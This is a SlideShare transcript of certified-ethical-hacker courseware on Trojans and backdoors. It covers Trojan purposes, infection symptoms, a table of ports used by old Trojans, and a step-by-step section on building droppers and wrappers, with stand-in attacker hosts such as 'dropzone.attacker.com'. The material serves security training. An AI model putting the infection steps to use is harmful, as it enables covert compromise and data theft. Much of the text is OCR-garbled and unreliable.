Your SlideShare is downloading. ×

Ce hv8 module 06 trojans and backdoors

846
views

Published on

Published in: Technology, News & Politics

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
846
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
240
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Trojans and Backdoors Module 06
  • 2. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Module 06 Engineered by Hackers. Presented by Professionals. CEH Ethical H acking and C ounterm easures v8 Module 06: Trojans and Backdoors Exam 312-50 Module 06 Page 828 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Security News 1 1111 1 11U i 1■ PCMAG.COM Troian Typ e s Indication of Troian Trojan Detection Troian Horse Construction Kit C yb e r-C rim in a ls Plan M assive Tro ja n A tta c k on 30 Banks Oct 05, 2012 1:24 PM EST A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appear to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post yesterday. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "anti-American motives," but simply because American banks are less likely to have deployed two-factor authentication for private banking consumers, Ahuvia said. European banks generally require all consumers to use two-factor for wire transfers, making it harder to launch a man-in-the-middle session hijacking attack. http://securitywatch.pcmag.com Copyright © by EG-Gouncil. All Rights Jteservfed.;Reproduction is Strictly Prohibited. ^ ps am S ecurity N ew s ‫״־‬ ‫ -יי‬fjfggC yber-C rim inals P lan M assive T rojan Attack on 30 Banks Source: http://securitvwatch.pcmag.com A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appears to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post recently. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "antiAmerican motives," but simply because American banks are less likely to have deployed twofactor authentication for private banking consumers, Ahuvia said. European banks generally require all consumers to use two-factor for wire transfers, making it harder to launch a man-inthe-middle session hijacking attack. Module 06 Page 829 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 4. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker "A cyber gang has recently communicated its plans to launch a Trojan attack spree on 30 American banks as part of a large-scale orchestrated crimeware campaign," Ahuvia said. Potential targets and relevant law enforcement agencies have already been notified, RSA said. RSA FraudAction was not sure how far along the recruitment campaign has gone, or when the attacks are expected. W hile it's possible revealing the gang's plans may cause the criminals to scuttle their operation, it may just cause the group to modify the attack. "There are so many Trojans available and so many points of failure in security that could go wrong, that they'd still have some chance of success," Ahuvia said. Anatomy of the Attack The proposed cyber-attack consists of several parts. The first part involves infecting victim computers with the variant of the Gozi Trojan, which RSA has dubbed Gozi Prinimalka, Once the computer has been compromised, it will communicate with the botmaster's computer, which has a "virtual machine syncing module," capable of duplicating the victim's PC settings, such as the time zone, screen resolution, cookies, browser type, and installed software IDs, into a virtual machine, RSA said. W hen the attacker accesses victim accounts using the cloned system, the virtual machine appears to be a legitimate system using the last-known IP address for the victim's computer, RSA said. This cloning module would make it easy for the attackers to log in and initiate wire transfers. The attackers also plan to use VoIP phone flooding software to prevent victims from receiving confirmation calls or texts verifying online account transfers and activity, RSA said. The recruits have to make an initial investment in hardware and agree to training on how to deploy the Gozi Trojan, Ahuvia wrote. They will receive executable files, but not the compilers used to create the Trojan. In return, the new partners in this venture will receive a cut of the profits. Trojan Behind Previous Attacks The Trojan is not as well-known as others, such as SpyEye or Citadel, nor is it as widely available, Ahuvia said. Its relative obscurity means antivirus and security tools are less likely to flag it as malicious. RSA has linked the Gozi Trojan to previous attacks responsible for more than $5 million in losses in the United States in 2008. The researchers have linked the Trojan to a group called the HangUp Team, and speculated the same group was behind this latest campaign. The way the attack is structured, it is very likely the targeted institutions won't even realize they'd been affected till at least a month or two after the attacks. "The gang will set a prescheduled D-day to launch its spree, and attempt to cash out as many compromised accounts as possible before its operations are ground to a halt by security systems," Ahuvia said. Module 06 Page 830 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 5. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker C o p yrig h t 1996-2012 Z iff Davis, Inc. By Author: Fahmida Y Rashid . http://securitvwatch.pcmag.com/none/B03577-cvber-criminals-plan-rr1assive-troian-attack-on30-banks Module 06 Page 831 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 6. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Module Objectives J What Is a Trojan? J Types of Trojans J What Do Trojan Creators Look For J Trojan Analysis J Indications of a Trojan Attack J How to Detect Trojans J Common Ports used by Trojans J Trojan Countermeasures J How to Infect Systems Using a Trojan J Trojan Horse Construction Kit J Different Ways a Trojan can Get into a System J Anti-Trojan Software J J Howto Deploy a Trojan C EH Pen Testing for Trojans and Backdoors ^ 1 I ly tz< J------- 1 Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule O b jectiv e s The main objective of this module is to provide you with knowledge about various kinds of Trojans and backdoors, the way they propagate or spread on the Internet, symptoms of these attacks, consequences of Trojan attacks, and various ways to protect network or system resources from Trojans and backdoor. This module also describes the penetration testing process to enhance your security against Trojans and backdoors. This module makes you familiarize with: e W hat Is a Trojan? © Types of Trojans © W hat Do Trojan Creators Look For? 0 Trojan Analysis © Indications of a Trojan Attack © How to Detect Trojans e Common Ports Used by Trojans © Trojan Countermeasures 0 How to Infect Systems Using a Trojan 0 Trojan Horse Construction Kit 0 Different Ways a Trojan Can Get into a 0 Anti-Trojan Software 0 Pen Testing for Trojans and Backdoors System 0 How to Deploy a Trojan Module 06 Page 832 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 7. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Module Flow CEH Penetration Testing Trojan Concepts Anti-Trojan Software Trojan Infection Countermeasures Types of Trojans Hg y Trojan Detection Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule Flow To understand various Trojans and backdoors and their impact on network and system resources, let's begin with basic concepts of Trojans. This section describes Trojans and highlights the purpose of Trojans, the symptoms of Trojan attacks, and the common ports used by Trojans. Countermeasures Trojan Concepts ,‫• נ‬ Trojans Infection f | j| | ‫ ־‬Anti-Trojan Software ■ 4 ^— Types of Trojans ^ v‫— ׳‬ 1 ‫׳׳‬ 1 Penetration Testing Trojan Detection Module 06 Page 833 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 8. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker CEH J J J It is a program in which the malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk Trojans replicate, spread, and get activated upon users' certain predefined actions With the help of a Trojan, an attacker gets access to the stored passwords in the Trojaned computer and would be able to read personal documents, delete files and display pictures, and/or show messages on the screen . . Send me credit card details Victim in Chicago infected with Trojan Here is my credit card number and expire date Send me Facebook account information Victim in London infected with Trojan Here is my Facebook login and profile Send me e-banking login info Victim in Paris infected with Trojan Here is my bank ATM and pincode Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. W hat Is a T rojan? According to Greek mythology, the Greeks won the Trojan W a r by entering in to the fortified city of Troy hiding in a huge, hollow wooden horse. The Greeks built a huge wooden horse for their soldiers to hide in. They left the horse in front of the gates of Troy. The Trojans thought it to be a gift from the Greeks, who had withdrawn from the war, and so they transported the horse into their city. At night, the Spartan soldiers broke through the wooden horse, and opened the gates for their soldiers who eventually destroyed the city of Troy. Taking a cue from Greek mythology, a computer Trojan is defined as a "malicious, securitybreaking program that is disguised as something benign." A computer Trojan horse is used to enter a victim's computer undetected, granting the attacker unrestricted access to the data stored on that computer and causing immense damage to the victim. For example, a user downloads what appears to be a movie or a music file, but when he or she runs it, it unleashes a dangerous program that may erase the unsuspecting user's disk and send his or her credit card numbers and passwords to a stranger. A Trojan can also be wrapped into a legitimate program, meaning that this program may have hidden functionality that the user is unaware of. In another scenario, a victim may also be used as an intermediary to attack others—without his or her knowledge. Attackers can use the victim's computer to commit illegal denial-of-service attacks such as those that virtually crippled the DALnet IRC network for months on end. Module 06 Page 834 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 9. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker (DALnet is an Internet relay chat (IRC) network that is a form of instant communication over the network.) Trojan horses work on the same level of privileges that the victim user has. If the victim had the privileges, Trojan can delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilegeelevation attacks). The Trojan horse can attempt to exploit a vulnerability to increase the level of access beyond that of the user running the Trojan horse. If successful, the Trojan horse can operate with increased privileges and may install other malicious codes on the victim's machine. A compromise of any system on a network may affect the other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or in a trivially encrypted form are particularly vulnerable. If a system on such a network is compromised, the intruder may be able to record user names and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and, thereby, cause the remote system to incur liabilities. Send me credit card details Here is my credit card number and expire date ;y ::!D y Victim in Chicago infected with Trojan Send me Facebook account Information Victim in London infected with Trojan Here is my Facebook login and profile Send me e-banking login info I Here is my bank ATM and pincode t j I »‫ י‬J Victim in Paris infected with Trojan FIGURE 6.1: Attacker extracting sensitive information from the system's infected with Trojan Module 06 Page 835 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 10. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Communication Paths: Overt and Covert Channels Overt Channel J A leg itim a te co m m u n icatio n Covert Channel J An u n au th o rize d ch an n e l used p ath w ith in a co m p u ter system, fo r transferring sensitive data o r n etw ork, for transfer of data J EH w ith in a com p uter system, or n etw o rk Exam ple of o vert channel includes gam es or any le g itim a te program s Poker.exe (Legitimate Application) J The sim plest form of covert channel is a Trojan * ^ Trojan.exe (Keylogger Steals Passwords) Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. n^ C o m m u n ic a tio n P ath s: O vert a n d C overt C h a n n e ls Overt means something that is explicit, obvious, or evident, whereas covert means something that is secret, concealed, or hidden. An overt channel is a legal, secure channel for the transfer of data or information within the network of a company. This channel is within the secure environment of the company and works securely for the transfer of data and information. On the other hand, a covert channel is an illegal, hidden path used to transfer data from a network. Covert channels are methods by which an attacker can hide data in a protocol that is undetectable. They rely on a technique called tunneling, which allows one protocol to be carried over another protocol. Covert channels are generally not used for information exchanges, so they cannot be detected by using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine. Module 06 Page 836 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 11. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Overt Channel Covert Channel A legitimate communication path within a computer system, or network, for the transfer of data A channel that transfers information within a computer system, or network, in a way that violates the security policy An overt channel can be exploited to create the presence of a covert channel by selecting components of the overt channels with care that are idle or not related The simplest form of covert channel is a Trojan TA BLE 6.1: Com parison b etw ee n O ve rt Channel and C overt Channel Module 06 Page 837 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 12. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Purpose of Trojans Delete or replace operating system's C EH Disable firew alls and antivirus critical files G enerate fake traffic to create DOS Create backdoors to gain remote attacks access Download sp yw are, a d w are, and Infect victim's PC as a proxy server malicious files for relaying attacks Record screenshots, audio, and vid eo Use victim 's PC as a b o tn et to of victim's PC perform DD 0 S attacks Steal information such as passwords, security codes, credit card information Use victim 's PC for spam m ing and blasting em ail messages using keyloggers Copyright © by EG-Gtancil. All Rights Reserved. Reproduction is Strictly Prohibited a.’* P u rp o se of T ro jan s I I Trojan horses are the dangerous malicious programs that affect computer systems without the victim's knowledge. The purpose of Trojan is to: 0 Delete or replace the operating system's critical files 0 Generate fake traffic to create DOS attacks 0 Download spyware, adware, and malicious files 0 Record screenshots, and audio and video of the victim's PC 0 Steal information such as passwords, security codes, and credit card information using keyloggers 0 Disable firewalls and antivirus software 0 Create backdoors to gain remote access 0 Infect a victim's PC as a proxy server for relaying attacks 0 Use a victim's PC as a botnet to perform DDoS attacks 0 Use a victim's PC for spamming and blasting email messages Module 06 Page 838 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 13. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker W hat Do Troj an C reators Look For Credit card information Financial data (bank account numbers, social security numbers, insurance information , etc.) CEH Using the victim's computer for illegal purposes, such as to hack, scan, flood, or infiltrate other machines on the network or Internet VISA Hacker Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. ^ W hat Do T ro jan C re ato rs Look For? Trojans are written to steal information from other systems and to exercise control over them. Trojans look for the target's personal information and, if found, return it to the Trojan writer (attacker). They can also allow attackers to take full control over a system. Trojans are not solely used for destructive purposes; they can also be used for spying on someone's machine and accessing private and/or sensitive information. Trojans are created for the following reasons: 9 To steal sensitive information, such as: © Credit card information, which can be used for domain registration, as well as for shopping. 9 Account data such as email passwords, dial-up passwords, and web services passwords. Email addresses also help attackers to spam. 9 Important company projects including presentations and work-related papers could be the targets of these attackers, who may be working for rival companies. Module 06 Page 839 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 14. Ethical Hacking and Countermeasures Trojans and Backdoors 9 Exam 312-50 Certified Ethical Hacker Attackers can use the target's computers for storing archives of illegal materials, such as child pornography. The target can continue to use their computer, and have no idea about the illegal activities for which their computer is being used. © Attackers can use the target computer as an FTP Server for pirated software. 0 Script kiddies may just want to have fun with the target's system. They might plant a Trojan in the system, which then starts acting strangely: the CD tray opens and closes frequently, the mouse functions improperly, etc. Q The compromised system might be used for other illegal purposes, and the target would be held responsible for all illegal activities, if the authorities discover them. < Hacker F IG U R E 6.2: H acker stealing credit card inform ation from victim Module 06 Page 840 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 15. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Indications of a Trojan Attack CEH Abnormal activity by the modem, network adapter, or hard drive CD-ROM drawer opens and closes by itself Computer browser is redirected ‫ש‬ to unknown pages The account passwords are changed or unauthorized access Strange chat boxes appear on victim's computer Strange purchase statements appear in the credit card bills Documents or messages are printed from the printer The ISP complains to the victim that his/her computer is IP themselves scanning Functions of the right and left * mouse buttons are reversed People know too much personal information about a victim Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited ^ ‫ ך־‬In d ic a tio n s of a T ro jan A ttack A Trojan is software designed to steal data and demolish your system. It creates a backdoor to attackers to intrude into your system in stealth mode. The system becomes vulnerable to the Trojan and attackers can easily launch their attack on the system if it is not safeguarded. Trojans can enter your system using various means such as email attachments, downloads, instant messages, open ports, etc. The following are some of the indications that you may notice on your system when it is attacked by the Trojan: 0 CD-ROM drawer opens and closes by itself 0 Computer browser is redirected to unknown pages 0 Strange chat boxes appear on target's computer 0 Documents or messages are printed from the printer 0 Functions of the right and left mouse buttons are reversed 0 Abnormal activity by the modem, network adapter, or hard drive 0 The account passwords are changed or unauthorized access 0 Strange purchase statements appear in the credit card bills 0 The ISP complains to the target that his or her computer is IP scanning 0 People know too much personal information about a target Module 06 Page 841 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 16. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker I n d ic a tio n s o f a T rojan A tta ck (Cont’d) Antivirus is disabled or does not work properly Screensaver's settings change automatically Windows color settings change (•Itlfwtf | g ‫ןן‬ Itklttl IU(kM Computer screen flips upside down or inverts Wallpaper or background settings change The computer shuts down and powers off by itself The taskbar disappears q Ctrl+Alt+Del stops working Copyright © by EC-CMICil. All Rights Reserved. Reproduction is Strictly Prohibited. In d ic a tio n s of a T ro jan A ttack (C ont’d) Though Trojans run in stealth mode, they exhibit some characteristics, observing which; you can determine the existence of Trojans on your computer. The following are typical symptoms of a Trojan horse virus infection: 9 Antivirus software is disabled or does not work properly 9 The taskbar disappears 9 Windows color settings change 9 Computer screen flips upside down or inverts 9 Screensaver's settings change automatically 9 Wallpaper or background settings change 9 Windows Start button disappears 9 Mouse pointer disappears or moves by itself 9 The computer shuts down and powers off by itself 9 Ctrl+Alt+Del stops working 9 Repeated crashes or programs open/close unexpectedly 9 The computer monitor turns itself off and on Module 06 Page 842 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 17. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors C o m m o n P orts u s e d b y T rojans CEH UrtifM Port Trojan Trojan Port 2 Death 20 Senna Spy 21 1807 Trojan Robo-Hack KZSH 6670-71 Shivka-Burka Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash Port 5569 DeepThroat 22222 GirlFriend 1.0, Beta-1.35 Prosiak GateCrasher, Priority 23456 Evil FTP, Ugly FTP Port FTP99CMP SpySender 6969 Delta NetSphere 1.27a 2001 80 Shaft Tiny Telnet Server Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Hackers Paradise Executor 421 TCP Wrappers trojan 2140 The Invasor 9989 iNi-Killer 456 Hackers Paradise lni*Killer, Phase Zero, Stealth Spy Satanz Backdoor 2155 Illusion Mailer, Nirvana 10607 3129 Masters Paradise The Invasor 11000 11223 Coma 1.0.9 Senna Spy Progenic trojan 12223 Hack'99 Keylogger 50505 22 23 25 31 m m 1 666 Shockrave BackDoor 1.00-1.03 Trojan Remote Grab NetMonitor Trojan Cow 7789 Ripper Bugs 4567 RAT 4590 WinCrash File Nail 1 ICQTrojan Psyber Stream Server, Voice 5000 Bubbel Ultors Trojan SubSeven 1.0-1.8 1245 5001 5321 Sockets de Troie Firehotcker 20001 Blade Runner 20034 VooDoo Doll 5400-02 ICKiller 31337-38 Back Orifice, DeepBO BackOfrice 2000 Portal of Doom Silencer, WebEx Doly Trojan 1170 IthKJl IlMkM NetSpy DK BOWhack 33333 BigGluck, TN The Spy 40421-26 Masters Paradise 40412 47262 12345*46 12361, 12362 16969 Prosiak 34324 Delta Sockets de Troie GabanBus, NetBus 50766 Whack-a-mole 53001 Priority Millennium 61466 SchoolBus .69-1.11 Telecommando 65000 Devil NetBus 2.0, BetaNetBus 2.01 54321 Fore Remote Windows Shutdown Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction is Strictly Prohibited. Com m on Ports Used by Trojans IP ports play an important role in connecting your computer to the Internet and surfing the web, downloading information and files, running software updates, and sending and receiving emails and messages so that you can connect to the world. Each computer has unique sending and receiving ports for each function. Users need to have a basic understanding of the state of an "active connection" and ports commonly used by Trojans to determine if the system has been compromised. There are different states, but the "listening" state is the important one in this context. This state is generated when a system listens for a port number when it is waiting to make a connection with another system. Trojans are in a listening state when a system is rebooted. Some Trojans use more than one port as one port may be used for "listening" and the other(s) for data transfer. Module 06 Page 843 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 18. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Port 2 20 Trojan Port Trojan Death 1492 FTP99CMP Senna Spy 1600 Shivka-Burka Blade Runner, Doly Trojan, Fore, Port Port Trojan 5569 Robo Hack 21544 GirlFriend 1.0, Beta 1.35 6670-71 DeepThroat 22222 Prosiak Evil FTP, Ugly FTP Trojan 1807 SpySender 6969 Gatecrasher, Priority 23456 22 Shaft 1981 Shockrave 7000 Remote Grab 26274 23 Tiny Telnet Server 1999 BackDoor 1.00 1.03 2001 Trojan Cow 21 25 Invisible FTP, WebEx, WinCrash Antigen, Email Password Sender, Terminator, WinPC, WinSpy, 7300-08 Delta NetMonitor 30100-02 NetSphere 1.27a 7789 ICKiller 31337-38 Back Orifice, DeepBO 8787 BackOfrice 2000 31339 NetSpy DK Portal of Doom 31666 BOWhack Prosiak 31 Hackers Paradise 2023 Ripper SO Executor 2115 Bugs 421 TCP Wrappers trojan 2140 The Invasor 9989 iNi-Killer 33333 456 Hackers Paradise 2155 Illusion Mailer, Nirvana 10607 Coma 1.0.9 34324 BigGluck.TN 555 Ini-Killer, Phase Zero, Stealth Spy 3129 Masters Paradise 11000 Senna Spy 40412 The Spy 11223 Progenic trojan 9872-9875 666 Satanz Backdoor 3150 The Invasor 1001 Silencer, WebEx 4092 WinCrash 1011 Do ly Trojan 4567 File Nail 1 12223 RAT 4590 ICQTrojan 12345-46 1095-98 1170 Psyber Stream Server, Voice 5000 Bubbel 40421-26 Masters Paradise 47262 12361, 12362 Delta Hack’‘)‘) Key Logger 50505 Sockets de Troie GabanBus, NetBus 50766 Fore Whack-a-mole 53001 Remote Windows Shutdown 1234 ultors Trojan 5001 sockets de Trole 16969 Priority 54321 SchoolBus .69-1.11 1243 SubSeven 1.0-1.8 5321 Firehotcker 20001 Millennium 61466 Telecommando Blade Runner 20034 65000 Devil V 00D00 Doll 5400-02 NetBus 2.0, Beta NetBus 2.01 TABLE 6.2: Common ports used by Trojans Module 06 Page 844 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 19. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors M o d u le F lo w CEH U rtifM IthKJi Nm Im So far we have discussed various Trojan concepts. Now we will discuss Trojan infections. Trojan Concepts Countermeasures Trojan Infection y— v‫׳‬ |||||r Anti-Trojan Softwares Types of Trojans ^ Penetration Testing ) — *‫ ר‬Trojan Detection In this section, we will discuss the different methods adopted by the attacker for installing Trojans on the victim's system and infecting their system with this malware. Module 06 Page 845 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 20. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors How to Infect S ystem s U sing a Trojan Create a new Trojan packet using a Trojan Horse Construction Kit p ce J ro ss £ U S f a Create a dropper, which is a part in a trojanized packet that installs the malicious code on the target system Example of a Dropper Installation path: cwindowssystem32svchosts .exe AlitOStart: HKLMSo£twareMlc runlexplorer. exe e O Malicious code 1... 0 Attacker ‫׳‬ Malicious Code Client address: client.attacker.com Dropzone: dropzone.attacker.com A genuine application Wrapper File name: chess.exe Wrapper data: Executable file Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. mi■1 HI " How to Infect System s Using a Trojan An attacker can control the hardware as well as software on the system remotely by installing Trojans. When a Trojan is installed on the system, not only does the data become vulnerable to threats, chances are that the attacker can perform attacks on the third-party system. Attackers infect the system using Trojans in many ways: 0 Trojans are included in bundled shareware or downloadable software. When a user downloads those files, Trojans are installed onto the systems automatically. 9 Users are tricked with the different pop-up ads. It is programmed by the attacker in such a way that it doesn't matter if is the user clicks YES or NO; a download starts and the Trojan is installed onto the system automatically. 0 Attackers send Trojans through email attachments. When those attachments are opened, the Trojan is installed on the system. Users are sometimes tempted to click on different kinds of files such as greeting cards, porn videos, images, etc., where Trojans are silently installed one the system. Module 06 Page 846 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 21. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors The step-by-step process for infecting machines using a Trojan is as follows: Step 1: Create a new Trojan packet using a Trojan Horse Construction Kit. Step 2: Create a dropper, which is a part in a Trojanized packet that installs the malicious code on the target system. n Example of a Dropper Installation path: Autostart: s cwindowssystem32svchosts.exe HKIiMSoftwareMi.c...run Ie3<plorer.e x e Malicious code Client address: dient.attacker.com Dropzone: dropzone.attacker.com Attacker Malicious Code A genuine application ■> W ra pper File name: chess.exe Wrapper data: Executable file FIGURE 6.3: Illustrating the process of infecting machines using Trojans (1 of 2) Module 06 Page 847 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 22. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors How to Infect S ystem s U sing a Trojan (C o n t’d) C EH Create a wrapper using wrapper tools to install Trojan on the victim's computer Propagate the Trojan Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. gr|jr How to Infect System s Using a Trojan (Cont’d) Step 3: Create a wrapper using tools to install the Trojan on the victim's computer. By using various tools like petite.exe, Graffiti.exe, EliteWrap, etc., a wrapper is created to install the Trojan on the victim's computer. Step 4: Propagate the Trojan. Computer virus propagation (spreading) can be done through various methods: 0 An automatic execution mechanism is one method where traditionally it was spread through floppy disks and is now spread through various external devices. Once the computer is booted, the virus automatically spreads over the computer. 0 Even viruses can be propagated through emails, Internet chats, network sharing, P2P file sharing, network redirecting, or hijacking. Step 5: Execute the Dropper. Dropper is used by attackers to disguise their malware. The user is confused and believes that all the files are genuine or known files. Once it gets loaded into the host computer, it helps other malware to get loaded and perform the task. Step 6: Execute the damage routine. Most computer viruses contain a Damage Routine that delivers payloads. A payload sometimes just displays some images or messages whereas other payloads can even delete files, reformat hard drives, or cause other damage. Module 06 Page 848 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 23. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors ...... Dropper - 1 1 ...... > Trojan Packet W ‫) 0־ ־‬ chess.exe s Wrapper ‫׳‬ * ■ y Dropper drops the Trojan 11 ----- ....... Attacker w Trojan code execution Victim's System FIGURE 6.4: Illustrating the process of infecting machines using Trojans (2 of 2) Module 06 Page 849 Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 24. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker W rappers CEH A wrapper binds a Trojan executable with an innocent looking .EXE application such ^as games or office applications Chess.exe Che / Trojan.exe Filesize: 90K Filpci7p• 7 0 k Filesize: 20K Pilpci Chess.exe Filesize: 110K When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground ‫־‬N Attackers might send a birthday greeting that will install a Trojan as the user The two programs are wrapped together into a single file V . J watches, for example, a birthday cake dancing across the screen Source: http://www.objs.com Wrappers are used to bind the Trojan executable with a genuine-looking .EXE application such as games or office applications. When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) on runtime. This makes it possible for the Trojan to get in virtually undetected, since most antivirus software is not able to detect the signatures in the file. The attacker can place several executables inside one executable, as well. These wrappers may also support functions such as running one file in the background while another one is running on the desktop. Technically speaking, wrappers can be considered another type of software "glueware" used to bind other software components together. A wrapper encapsulates into a single data source to make it usable in a more convenient fashion than the original unwrapped source. Users can be tricked into installing Trojan horses by being enticed or frightened. For instance, a Trojan horse might arrive in an email described as a computer game. When the user receives the mail, the description of the game may entice him or her to install it. Although it may, in fact, be a game, it may also be taking other action that is not readily apparent to the user, such as Module 06 Page 850 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 25. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors deleting files or mailing sensitive information to the attacker. In another instance, wan attacker sends a birthday greeting that will install a Trojan as the user watches, such as a birthday cake dancing across the screen. 8 l t (W ? Chess.exe Filesize: 90K Tro ja n .e x e ^ Filesize: 20K cness.exe Chess.exe ^ Filesize: 110K FIGURE 6.5: Wrappers Module 06 Page 851 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
